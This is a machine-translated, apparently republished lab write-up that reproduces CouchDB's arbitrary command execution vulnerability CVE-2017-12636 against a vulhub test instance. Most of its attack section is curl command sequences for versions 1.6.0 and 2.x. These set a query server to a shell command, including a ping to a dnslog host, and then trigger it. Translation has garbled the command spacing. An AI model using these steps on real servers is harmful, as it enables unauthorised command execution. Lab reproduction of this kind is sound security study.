Shulou(Shulou.com)05/31 Report--

In this issue, the editor will bring you about how to carry out couchdb arbitrary command execution loophole CVE-2017-12636 reproduction, the article is rich in content and professional analysis and description for you, after reading this article, I hope you can get something.

CouchDB is an open source document-oriented database management system that can be accessed through RESTful JavaScript Object Notation (JSON) API. The term "Couch" is an acronym for "Cluster Of Unreliable Commodity Hardware" and reflects the high scalability of CouchDB's goals, providing high availability and reliability, even on fault-prone hardware.

On November 15, 2017, CVE-2017-12635 and CVE-2017-12636 disclosed that CVE-2017-12636 is an arbitrary command execution vulnerability, and we can modify couchdb's configuration query_server through config api, which will be run when view is designed and executed.

Vulnerability impact version: less than 1.7.0 and less than 2.1.1

Since the exploit condition needs to be triggered by a login user, it is usually exploited in conjunction with CVE-2017-12635.

CVE-2017-12635 reproduce article link

The following is only for vulnerability recurrence record and implementation, and the utilization process is as follows:

1. Vulnerability environment

Target link: http://192.168.101.152:5984/

The access link http://192.168.101.152:5984/_utils/ is as follows

Due to the difference between the API interfaces of Couchdb 2.x and 1.x, the way of utilization is also different. The demo version here is version 1.6.0.

two。 Vulnerability exploitation

1.6.0 vulnerability exploitation:

Trigger by executing the following command in turn

Where vulhub:vulhub is the administrator's account password

Curl-X PUT 'http://vulhub:vulhub@192.168.101.152:5984/_config/query_servers/cmd'-d' "ping test.kfqhkz.dnslog.cn"'

Curl-X PUT 'http://vulhub:vulhub@192.168.101.152:5984/vultest'

Curl-X PUT 'http://vulhub:vulhub@192.168.101.152:5984/vultest/vul'-d' {"_ id": "770895a97726d5ca6d70a22173005c7b"}'

Curl-X POST 'http://vulhub:vulhub@192.168.101.152:5984/vultest/_temp_view?limit=10'-d' {"language": "cmd", "map": ""}'- H 'Content-Type:application/json'

Check dnslog after execution

Command executed successfully

2.x vulnerabilities are exploited as follows:

Couchdb 2.x introduces clustering, so changing the configuration of API requires the addition of node name. In fact, this is also simple. We can access `/ _ membership` with the account password:

`

Curl http://vulhub:vulhub@your-ip:5984/_membership

`

As you can see, we have only one node here, whose name is `nonode@ nohost`.

Then, we modify the configuration of `nonode@ nohost`:

`

Curl-X PUT http://vulhub:vulhub@your-ip:5984/_node/nonode@nohost/_config/query_servers/cmd-d'"id > / tmp/success"'

`

Then, in the same way we used 1.6.0, we first added a Database and a Document:

`

Curl-X PUT 'http://vulhub:vulhub@your-ip:5984/vultest'

Curl-X PUT 'http://vulhub:vulhub@your-ip:5984/vultest/vul'-d' {"_ id": "770895a97726d5ca6d70a22173005c7b"}'

`

Couchdb 2.x deletes `_ temp_ view`, so in order to trigger the command defined in `query_ servers`, we need to add a` _ view`:

`

Curl-X PUT http://vulhub:vulhub@your-ip:5984/vultest/_design/vul-d'{"_ id": "_ design/test", "views": {"wooyun": {"map": ""}}, "language": "cmd"}'- H "Content-Type: application/json"

`

The command in `query_ servers` is triggered when `_ view` is added.

The above is the editor for you to share how to carry out couchdb arbitrary command execution loophole CVE-2017-12636 repeated, if there happen to be similar doubts, you might as well refer to the above analysis to understand. If you want to know more about it, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.